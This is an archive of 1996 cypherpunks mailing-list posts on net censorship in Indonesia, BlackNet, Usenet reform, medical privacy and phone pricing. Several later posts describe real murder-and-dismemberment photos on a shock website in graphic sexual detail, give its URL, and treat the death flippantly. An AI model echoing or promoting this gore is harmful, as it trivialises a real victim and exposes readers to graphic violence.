   NAKED WOMAN DECAPITATES MAN ON INTERNET - Pictures of a naked young
   woman decapitating a man with a saw are available on the Internet, to
   the consternation of police in Munich who say they are unable to do
   anything about it. [AGENCE FRANCE PRESSE, 175 words]

-rich
 who thought the associated press was bad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Tue, 20 Aug 1996 04:50:57 +0800
To: cypherpunks@toad.com
Subject: Indonesia detains democracy activist after post to mailing list (fwd)
Message-ID: <m0usY9P-00024YC@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> Date: Mon, 19 Aug 1996 07:05:33 -0700 (PDT)
> From: Declan McCullagh <declan@eff.org>
> To: cypherpunks@toad.com
> Subject: Indonesia detains democracy activist after post to mailing list


>    HotWired, The Netizen
>    19 August 1996
> 
>    Trouble in Paradise
>    by Declan McCullagh (declan@well.com)
>    Washington, DC, 18 August
>    
>    Indonesian democracy activists have taken their fight for freedom
>    to the Net, and the government doesn't approve.
>    
>    After distributing email messages about riots in Jakarta last month to
>    an international Indonesian-politics mailing list, Prihadi Beny
>    Waluyo, a lecturer at Duta Wacana Christian University, was arrested
>    and interrogated by the military. Since then, the mailing list has
>    been banned from the country and Waluyo has returned to his house,
>    where he remains under surveillance.
>    

[dan lain-lain...]

Exactly which mailing list was "banned from the country"? All the
Indonesian mailing lists I'm on, including apakabar@clark.net, are
functioning normally, with no unusual complaints or interruptions.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Tue, 20 Aug 1996 08:11:49 +0800
To: cypherpunks@toad.com
Subject: BlackNet: Commercial Posts?
Message-ID: <199608192001.NAA26620@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 19 Aug 96, 7:03, Hal wrote:

> service, or in fact a network of any sort.  Rather, it is a vendor. 
> It buys and sells information. 

My question to the list:

Who benefits from all this publicity and brew-ha-ha?  Who makes all 
the BlackNet money?  Who really cares if it is a Data Haven or just a 
remailer?  I'm just asking.  

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 20 Aug 1996 08:38:21 +0800
To: Black Unicorn <cypherpunks@toad.com
Subject: Re: "Utilization Review"
Message-ID: <199608192029.NAA28776@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:22 AM 8/19/96 -0400, Black Unicorn wrote:
>I listened with horror this evening to a radio program which 
>discussed the state of medical record privacy today.

Unfortunatly, it is still true that whoever pays the piper calls the tune. 
The best way to ensure medical record privacy is to eliminate medical
insurance.  Perhaps, within our current social order, medical savings plans
are the best option on the table.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 20 Aug 1996 08:44:23 +0800
To: cypherpunks@toad.com
Subject: [RANT] Death of Usenet: Film at 11
Message-ID: <199608192034.NAA19771@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

[snip]

 > There are of course now more than 20,000 newsgroups.
 > Searches and greps of the newsgroup list are a way to find
 > potentially relevant newsgroups for posting a message or
 > finding messages of interest.

 > (As is well-known, the Usenet Cabal gets its orders from
 > the Bilderbergers as to which newsgroups fit in with New
 > World Order sanctioned epistemologies.)

 > Some are saying there is an alternate method. With the
 > advent of search engines which can index messages on the
 > Usenet (and in Webspace, but the idea is the same), why not
 > this alternative: put your message in a bottle and just
 > throw it into the "sea" of possible messages. Let search
 > engines find the messages of interest (modulo a day or two
 > of latency, as the spiders reach the space where the message
 > was placed). No newsgroups needed.

Permit me to go off in an orthogonal direction here and say that
I think that we should do away with the concept of a pre-ordained
newsgroups in Usenet entirely, in favor of an IRC-like dynamic 
creation of message pools.

One of the nice things about IRC is that if the Empire State
Building suddenly blows up, you can tune to #bomb and generally
find several hundred people interested in discussing it without
having to go through some complicated newgroup/rmgroup/discussion
procedure.

The real data base of Usenet is the totality of messages, indexed
by message ID, and there are so many newsgroups now that allowing
the Newsgroups: line to have arbitrary contents in the message
header would do little to increase the confusion. Entering each
arbitrary entry in the Newsgroups: line into a secondary
searchable index would provide the same functionality as we have
now with the conventional arrangement of newsgroups.

News software would certainly be free to map the Usenet hierarchy
onto a directory structure, as is done today, or to simply keep
it as a large flat database with multiple indices, or to do any
combination of the above, such as an arrangement where populated
newsgroups get their own directory, and everything else resides
in a giant directory called "/usr/spool/news/krap."

With governments creating lists of "banned" newsgroups, and an
official creation process managed by the "Cabal", Usenet is much
more vulnerable to state control than it would be if newsgroups
were simply arbitrary strings which existed somewhere in the
current window into the history file.  A newsgroup would then
exist if there were messages in it, and wouldn't exist if it had
remained unused for some reasonable period of time.

Now that search engines are becoming the best way to read Usenet
anyway, and the Newsgroups: line is just another field in a set
of search specifications, there is no reasonable reason to limit
what may be placed there to some list of "20,000" pre-defined
strings, or some government controlled subset of the above.

If Singapore bans alt.sex.hooters, you could simply post to
alt.culture.singapore.i.got.your.hooters.right.here. This
would effectly jerk the rug out from under the "banned
newsgroups" gestapo, and create a namespace so large you would
always be able to construct an appropriately suggestive new entry
in the compliment of any part that was blocked.

It would also send the correct message that "newsgroups" are
simply one of many labels on an article, and are not cyberspacial
tearooms where bad people congregate and there is guilt by
association.

The alternative to doing something reasonable like this is
probably to see mass migration from "banned newsgroups" to
off-topic groups, like Lolita pictures in rec.pets.cats, when the
inevitable crackdown comes. As long as people can post
anonymously, they will simply switch to another existing
newsgroup when the one they are posting to becomes blocked. Once
the inevitable reciprocal pissing contest between posters and
censors gets going, Usenet as we know it will likely be
destroyed.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Tue, 20 Aug 1996 08:31:49 +0800
To: cypherpunks@toad.com
Subject: Netscape-US for foreign students at Stanford, elsewhere?
Message-ID: <199608192034.NAA02945@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The US version of Netscape 3.0 has been installed in /usr/pubsw for all
supported platforms, including Linux. /usr/pubsw can be mounted anonymously
via AFS. Is this true at other major universities? Is anyone interested in
prosecuting us? Nobody has ever complained about the PGP binary's being
available for years.

-rich
 speaking only for his evil twin skippy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Tue, 20 Aug 1996 09:33:22 +0800
To: Charles Gimon <gimonca@skypoint.com>
Subject: Re: Indonesia detains democracy activist after post to mailing list (fwd)
In-Reply-To: <m0usY9P-00024YC@mirage.skypoint.com>
Message-ID: <Pine.GUL.3.95.960819144001.2971B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 19 Aug 1996, Charles Gimon wrote:
[...]
> >    Trouble in Paradise
> >    by Declan McCullagh (declan@well.com)
> >    Washington, DC, 18 August
> >    
> >    Indonesian democracy activists have taken their fight for freedom
> >    to the Net, and the government doesn't approve.
> >    
> >    After distributing email messages about riots in Jakarta last month to
> >    an international Indonesian-politics mailing list, Prihadi Beny
> >    Waluyo, a lecturer at Duta Wacana Christian University, was arrested
> >    and interrogated by the military. Since then, the mailing list has
> >    been banned from the country and Waluyo has returned to his house,
> >    where he remains under surveillance.
> 
> [dan lain-lain...]
> 
> Exactly which mailing list was "banned from the country"? All the
> Indonesian mailing lists I'm on, including apakabar@clark.net, are
> functioning normally, with no unusual complaints or interruptions.

Never mind the details. What's important is that this is yet another example
of net censorship, like the Berkeley administration's reading student email
and the FBI's monitoring and disrupting patriot email. 

It's really sad, the difference between HRW/AI and Wired. You know, Amnesty
has some outstanding policies regarding accuracy, objectivity, and
universality. That's why they're accorded such respect. Human Rights Watch,
which has only been around since the late 70's and committed a few major
faux pas in Central America, is still learning. Wired decided that it had
all the answers years ago.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMhjoIJNcNyVVy0jxAQG4rwH+L0du5/Ykcz1zu0VXjdQgS/5b9KVVmRbQ
Bj7nFO5P87+oZzw9JlBCMrVNZ4tM4oIxoKKhA/O8PytUd7T6B0U0yA==
=xQVR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Carpenter <mcarpent@mailhost.tcs.tulane.edu>
Date: Tue, 20 Aug 1996 08:21:58 +0800
To: campbell@c2.org
Subject: emscrypt and replay attacks
In-Reply-To: <9608191513.AA11169@cfdevx1.lehman.com>
Message-ID: <199608192023.PAA20241@rs6.tcs.tulane.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rick Campbell writes:

>>     P.S. I have an alpha version of a program which may be of interest to
>>     technomads: it automatically executes scripts received by email from a
>>     remote machine and then mails back the results.  The scripts (shell
      ... 
> 
> Does your mechanism do anything to prevent replay attacks?
> 
> 			Rick

Alan apparrently forwarded my message from technomads to cypherpunks,
but since I'm on cypherpunks too, I got this message.  Anyway, yes it
does have a simple replay attack prevention mechanism.  It keeps track
of the most recent time and date stamp from the PGP signature info and
refuses to executed any message that doesn't have a stamp more recent
than previously executed script.  This simple mechanism can cause
unwanted rejection if scripts are received out of order, but multiple
scripts can be batched into a single message to help overcome this.

See the following URL for a discussion of known limitations and security
concerns with emscrypt:

  http://www.bmen.tulane.edu/~carpente/emscrypt/emscrypt_doc.html#limits


--Matt

--
mcarpent@mailhost.tcs.tulane.edu    PGP mail preferred, finger for public key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 20 Aug 1996 09:44:44 +0800
To: vipul@pobox.com
Subject: Re: Phoneco vs X-Phone
Message-ID: <199608192246.PAA08982@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:02 AM 8/20/96 +0000, Vipul Ved Prakash wrote:
>> 
>> Well, let's consider such costs.  Most of which (maintenance, management, 
>> rolling stock) are unrelated to amount of telephone usage.  So there is no 
>> reason that these costs should be unequally attributed to a person who 
makes 
>> local calls 1 hour per day, as opposed to another who only calls 15 minutes 
>> per day, for example.
>> 
>> As for the "laying new pipes" issue:  Years ago in the the US, when 
>> inter-central-office trunk connections were all implemented using large 
>> bundles of copper pairs, it would have been _correct_ to say that higher 
>> telephone usage resulted in larger costs, since more trunk lines were 
>> necessary.  Today, on the other hand, inter-office trunks (at least the new 
>> ones, and I presume that even many of the old ones have been switched over) 
>> are implemented in fiber optics.  Extra capacity is either automatically 
>> available (since the capacity of a given fiber is unlikely to be fully 
used) 
>> or can be fairly simply added by converting old fiber from about 450 
>> megabits per second to 2.4 gigabits, or even faster rates which have become 
>> more recently available.
>> 
> 
>Your view point doesn't really fit the facts, but since it is not the
>issue here, I'll let it go.

What do you mean, "doesn't really fit the facts"?!?  What part of it was 
incorrect?  Fiber-optic _is_ commonly used in inter-office trunks, right?  
It doesn't wear out, right?  Higher usage doesn't entail greater costs, 
right?  The capacity, while not strictly infinite, is high enough so 
expanded usage doesn't strain most links, right?  Finally, modern phone 
switches have sufficient connect capacity so that they can handle usage 
which would have been considered "unusual" by yesteryear's standards.  All 
of this points to an obvious conclusion:  Telephone companies do not, in 
general, have increased costs as a consequence of increased telephone usage.

Here's what I think is _really_ going on:  You have decided that you think 
the costs of the telephone system should be apportioned by usage EVEN IF 
higher usage is no more costly to provide.  That's why you don't want to  
disprove my claims.  You're afraid that you'll have to say, "Yes, you're 
right Jim, but I _still_ think billing should be porportional to use."


>Can't resist like someone has to pay those 80,000+ 
>employees at AT+T.

Some of whom are probably unnecessary.  Interestingly enough, the rumor is 
that half the costs for LD are in billing and customer service.  Most of 
these costs would disappear if LD was unmetered.  

>
>> >But you miss my point, if a phoneco is not getting a penny for its long 
>> distanceservices (which subsidise the flat rate local calls) then the 
choice 
>> would
>> >be to close down. Which would be a severe attack to the local internet 
usage.
>> 
>> That's an entirely unsupported claim.  Nobody claims that telephone usage 
>> (term used generically) is on the way out.  "Closing down" is only going to 
>> happen if local phonecos cease to be able to provide a service that people 
>> are willing to pay for.
>
>Exactly! Once "X-Phone" has its servers in US Cities, and its charging 10 
cents 
>a minute for long distance calls, I don't see if the phonecos would be able 
to provide any service that people are willing to pay for, I mean they won't
>be able to provide matching lucrative rates. 

I am confident that local phonecos can remain competitive even against 
"free" Internet telephone service.  What they need to do is simple:  
Entirely remove the LD/local subsidy, remove metering on LD (as well as 
local), bill yearly for far lower costs, etc.  Once this is done, LD will be 
"free", at least on a marginal basis, so no customer will have any 
motivation to move to "Internet telephone" service.


>You mean to say that, X-Phone will take advantage of the phoneco and mint 
>money for a minimal investment, whereas the phoneco who spent billions on the
>infrastructure will be just whistle down the road, and let the X-Phone 
>indulge in its own cyberdo.

In the US, the current telephone company infrastructure is ALREADY PAID FOR. 
 It was paid for by over-inflated rates during a monopolized era.   If 
anything, the locals have an "unfair advantage" over the rest of the 
companies:  Only they have a copper pair into every home.  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Tue, 20 Aug 1996 09:01:44 +0800
To: cypherpunks@toad.com
Subject: Hackers invade DOJ web si
Message-ID: <TCPSMTP.16.8.19.-16.34.12.2645935021.663275@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> CNN online (http://www.cnn.com) is reporting a "breakin" by "hackers"
 In> to the DOJ web site.  They don't elaborate exactly how thy did it.

 They broke in and posted obscene messages and pornographic pictures...


 P.J.
 pjn@nworks.com



... Captian's log, stardate 25970-point-5.  I am nailed to the hull.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Aug 1996 16:56:46 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Naked woman decrapitates man on Internet!!!
Message-ID: <ae3eacc200021004a5e4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 8/19/96, Ross Wright wrote:
>Sick, stuff.  Yet everyone has to sneek a peek, just like a car
>crash.  Hey, I did.  I made the whole trip through the lurid pages.
>

Seven billion (thousand million for you Brits) people in the world. More
than 10,000 deaths every hour, or about 5 deaths per second.

What's so sick about one measly death? Just another crime, like thousands
of others every day. They just got caught. At least he's immortalized on
the Net.

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sentiono Leowinata" <sentiono@cycor.ca>
Date: Tue, 20 Aug 1996 07:55:20 +0800
To: "declan@eff.org>
Subject: Re: Indonesia detains democracy activist after post to mailing list
Message-ID: <199608191940.QAA11322@bud.peinet.pe.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Aug 1996 07:05:33 -0700 (PDT), Declan McCullagh wrote:

>Date: Sun, 18 Aug 1996 21:23:29 -0700 (PDT)
>From: Declan McCullagh <declan@well.com>
>To: fight-censorship@vorlon.mit.edu
>Subject: Indonesia detains democracy activist after post to mailing list

>Indonesia is joining the rest of the world in cracking down on online
>speech. Perhaps the lesson here is that no matter how much the Internet
>supposedly "routes around censorship," the most vulnerable points are the
>humans on both ends. More info on the global net-crackdown is at: 
>  http://www.eff.org/~declan/global/
>-Declan

Hi there,

Just to add gasoline on the burning flame. 
It doesn't happen just now. It is always like that. 
The attention on Indonesia issues by people (western media) is too
much focus on East Timor and they forget that there are much more
severe violations happening. 
I just hope that this example will open people's eyes that
Indonesian's problems are not only East Timor affairs but much more.
Arrest of one mailing list's maintainer is common, you would be
surprised how many people actually 'disappear' because of this.

Regards,
Sent.

---------------------------------------------------------------------------
Sentiono Leowinata, sentiono@cycor.ca, 1-902-629-2488
Security Specialist  -  HookUp Communications.
Charlottetown, Prince Edward Island, Canada.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 20 Aug 1996 11:01:12 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Death of Usenet: Film at 11
Message-ID: <199608200001.RAA02120@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:34 PM 8/19/96 -0700, Mike Duvos wrote:
>Permit me to go off in an orthogonal direction here and say that
>I think that we should do away with the concept of a pre-ordained
>newsgroups in Usenet entirely, in favor of an IRC-like dynamic 
>creation of message pools.

Moderated newsgroups gain reputation from their moderation policies and
probably should not be included in this scheme.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 20 Aug 1996 09:06:26 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: CS First Boston lawsuit
In-Reply-To: <ae3d43f90a021004dcf8@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960819170711.22993B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Look at the bulletin board of your county courthouse. John Doe parties 
are not unusual at all.

Everyone is  deemed to have constructive  notice of notices on that board; 
furthermore, every jurisdiction I've ever seen, also provides for the 
_publication_ of process.  Ya know, that stuff in teensie-weensie print 
in the back of newspapers.

Most peoplke don't read that stuff. Some people do. It opens up a flavor 
of arbitraging.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Tue, 20 Aug 1996 09:09:26 +0800
To: raph@kiwi.cs.berkeley.edu
Subject: Nymrod is shutting down
Message-ID: <87pw4nm38n.fsf@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


The following message is a courtesy copy of an article
that has been posted as well.

-----BEGIN PGP SIGNED MESSAGE-----

	The nymserver located at nymrod.jpunix.com is shutting down
due to abuse. The type-I/type-II MiddleMan remailers are unaffected.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhjnFVOTpEThrthvAQFcQAP+LYtkT16wJGmmzbYymzRJv1IRdVotwvrY
4hUKn5y+TyCTWoyHQlUR3//L0nRPzViqm1GBeT4Tw88kmEvmRSguCYTxuNV3gr6t
n8gOP/MKoYTZ1tdxYRMDd+LN2I4j2phUF90sItiLT04/JD65CwRNblD0bFWSbGr7
X8YiOIVkxTQ=
=VA6N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 20 Aug 1996 09:14:40 +0800
To: Stephen Cobb <stephen@iu.net>
Subject: Re: US Taxes on X-Pats (getting off topic)
In-Reply-To: <1.5.4.32.19960819135353.009e0510@iu.net>
Message-ID: <Pine.SV4.3.91.960819172944.22993I-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


It sounds unfair, for sure. However, the whole thing is a fraud based 
upon a myth. FICA witholding is NOT credited to an individual's account, 
or even to Social Security benefits in general. By statutory law, all 
such receipts go into the Treasury's general fund.

So, they are NOT "social security contributions". Period.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Tue, 20 Aug 1996 11:25:05 +0800
To: cypherpunks@toad.com
Subject: Re: Naked woman decapitates man on Internet!!!
In-Reply-To: <Pine.BSD.3.92.960819181607.5683A-100000@miso.wwa.com>
Message-ID: <Pine.GUL.3.95.960819171725.2971E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


There seems to be some confusion about the facts of the case, i.e., whether
the pictures really came from a case that was solved. I assume that that
will all be cleared up, but I'm not laughing anymore. 

I can imagine some kid gleefully accepting such pics to put up on a
grotesque page as an anti-censorship demonstration -- and then finding out
that he had the only evidence to an unsolved crime. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 20 Aug 1996 09:07:09 +0800
To: Rick Campbell <campbell@c2.org>
Subject: Re: your mail
In-Reply-To: <9608191513.AA11169@cfdevx1.lehman.com>
Message-ID: <Pine.SV4.3.91.960819173426.22993K-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I didn't write the message, "I have an Alpha...."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 20 Aug 1996 12:10:51 +0800
To: cypherpunks@toad.com
Subject: Re: search engine improvement
In-Reply-To: <199608191931.VAA02971@digicash.com>
Message-ID: <Pine.GUL.3.95.960819173400.2971F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Aug 1996 bryce@digicash.com wrote:

[good ideas about distributed ratings systems]

> There is the interesting issue of whether this will cause
> self-reinforcing "degeneration", where people (or an
> "affiliation"-keyed group of people) accidentally overlook a
> worthy page early in the game, and then, using each other's
> behavior to influence their own, reinforce that mistake.

It probably will. But people like being degenerates.

Another interesting issue for privacy is setting the granularity of the
information. If you know that only a few people have visited site A, and
you tell the distributing service that you like site A, then the rating
service has the potential to become a way to track people (to a certain
margin of error). Were I running such a service, I wouldn't hand out
information until enough static had accumulated to provide anonymity.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 20 Aug 1996 11:53:17 +0800
To: cypherpunks@toad.com
Subject: Re: "Utilization Review"
In-Reply-To: <199608192029.NAA28776@netcom8.netcom.com>
Message-ID: <Pine.GUL.3.95.960819174621.2971G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Aug 1996, Bill Frantz wrote:

> At 12:22 AM 8/19/96 -0400, Black Unicorn wrote:
> >I listened with horror this evening to a radio program which 
> >discussed the state of medical record privacy today.
> 
> Unfortunatly, it is still true that whoever pays the piper calls the tune. 
> The best way to ensure medical record privacy is to eliminate medical
> insurance.

Or even better: don't get sick.

> Perhaps, within our current social order, medical savings plans
> are the best option on the table.

What alternative social orders can you envision that would handle this
problem elegantly? I can't think of any off the top of my head. 

Medical savings plans do not work for anyone but the extremely rich and
healthy, because few normal people can self-insure to cover the risk. With
pooled risk, the prospective customer has the right to know the risks
already in the pool before diving in. Contracts based on infinite
uncertaintly tend not to work.

There's also the little matter of letting your doctor know your medical
history. That data needs to be stored somewhere in clear text (as respects
my lack of involvement in the release, that is). If I'm unconscious, I can't
tell them my passphrase. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vincent L. Diaz" <vldiaz@adnc.com>
Date: Tue, 20 Aug 1996 12:01:17 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Agents, Spiders, Linda, and BlackNet
Message-ID: <2.2.16.19960819180929.322f402c@mail.adnc.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim:

At 10:58 AM 8/19/96 -0700, you wrote:
>
>Key Phrases: agents, spiders, linda, blacknet, indexing, hierarchy,
>alternatives to hierarchy, emergent indexing, aptical foddering, tuple
>spaces, virtual communities, shared environments

(Snip)

>Just some ideas. Nothing new, to me at least. But I thought some of the
>newer list members might not have seen some of these ideas, part of the
>assumed culture to we crypto anarchists.

I currently subscribe to DigitalLiberty and am very new to Cypherpunks. I wanted
to thank you for thinking of us "Newbies" in the Crypto field with this
submission.

I hope that your will at some time in the future seriously consider a
comprehensive book
on this and other subjects skewed towards the general public.







Regards,

VINCENT L. DIAZ
U-SAVE COMMUNICATIONS
Business Line: 619-277-2411
Fax Line:         619-277-0298
http://www.cognigen.com/agencies/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <printing@explicit.com>
Date: Tue, 20 Aug 1996 10:11:56 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: Naked woman decapitates man on Internet!!!
In-Reply-To: <Pine.GUL.3.95.960819122021.1842D-100000@Networking.Stanford.EDU>
Message-ID: <Pine.BSD.3.92.960819181607.5683A-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Aug 1996, Rich Graves wrote:

> You just gotta love the headline. Anyone have the URL?

Dan's Gallery of the Grotesk

http://www.grotesque.com

The series is 'Natural Born Losers' Where this biker chick and
her new boyfriend perform a sex act with the soon to be dead
ex-boyfriend, and then they both use a hacksaw to chop the poor
fellow into pieces.  The couple shot the film and dropped it
off to a 'friend' at a one-hour photo place and someone else
looked at the photos and called the police.  Don't eat *anything*
before viewing these pictures!

> Seen on Newspage headlines; I assume the full text is on ClariNet.
>
>    NAKED WOMAN DECAPITATES MAN ON INTERNET - Pictures of a naked young
>    woman decapitating a man with a saw are available on the Internet, to
>    the consternation of police in Munich who say they are unable to do
>    anything about it. [AGENCE FRANCE PRESSE, 175 words]
>
> -rich
>  who thought the associated press was bad

William Knowles
Graphically Explicit
printing@explicit.com


--
Graphically Explicit Advertising       <printing@explicit.com>
PGP mail welcome & prefered / KeyID 1024/415D7FF9
PGP Fingerprint D3 45 A4 38 73 99 77 4A   98 BB A2 81 97 68 73 03
--
Explicit isn't a dirty word, Or is it?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Tue, 20 Aug 1996 12:21:57 +0800
To: Scottauge@aol.com
Subject: Re: No Subject - Lesson in cracking (cryptoanalysis 001)
In-Reply-To: <960819193406_263572605@emout14.mail.aol.com>
Message-ID: <Pine.3.89.9608191812.A24786-0100000@netcom16>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Aug 1996 Scottauge@aol.com wrote:

[highly insecure algorithm snipped]

Scottauge@aol.com wrote:

[very nice explanation of why above algorithm is insecure snipped]

> 
> Anyone else wanna explain things too?
> 
No, but I have this really great crypto program right here thet I'll give 
to you if you perform just a little debugging on it!!!  It uses the 
well-known and well-tested Noitutitsbus method and is GUARANTEED to be 
COMPLETELY UNBREAKABLE!!!  Get your copy NOW before its cracked...er...gone!

:)

---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Aug 1996 12:37:26 +0800
To: cypherpunks@toad.com
Subject: Re: BlackNet: Commercial Posts?
Message-ID: <ae3e66b5150210042b54@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:05 PM 8/19/96, Ross Wright wrote:
>On Or About 19 Aug 96, 7:03, Hal wrote:
>
>> service, or in fact a network of any sort.  Rather, it is a vendor.
>> It buys and sells information.
>
>My question to the list:
>
>Who benefits from all this publicity and brew-ha-ha?  Who makes all
>the BlackNet money?  Who really cares if it is a Data Haven or just a
>remailer?  I'm just asking.

Well, obviously I do. I receive $1.42 for every posting which mentions
BlackNet, 7% of gross sales for all commercial transactions, and 12.5% plus
a sliding finder's fee for all military and intelligence secrets sold via
BlackNet.

But all true paranoiacs knew this.

--Aldrich Ames

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 20 Aug 1996 10:33:45 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: Naked woman decapitates man on Internet!!!
In-Reply-To: <Pine.GUL.3.95.960819122021.1842D-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SCO.3.93.960819184212.8520D-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Aug 1996, Rich Graves wrote:

Yes, it's true.  Her boyfriend kills the guy while she's
giving him a blow job.  Then they "get naked," hack up the body, and pose
various body parts in, uh, 'interesting' positions.  The whole story's on
the Web site.  Check them out at:

http://www.grotesque.com/

The web site is the Gallery of the Grotesque.  The "exhibit" you're
looking for is the "Natural Born Losers" section.  Other sections are also
fascinating if you like this sort of stuff.

> You just gotta love the headline. Anyone have the URL?
> 
> Seen on Newspage headlines; I assume the full text is on ClariNet.        
> 
>    NAKED WOMAN DECAPITATES MAN ON INTERNET - Pictures of a naked young
>    woman decapitating a man with a saw are available on the Internet, to
>    the consternation of police in Munich who say they are unable to do
>    anything about it. [AGENCE FRANCE PRESSE, 175 words]
> 
> -rich
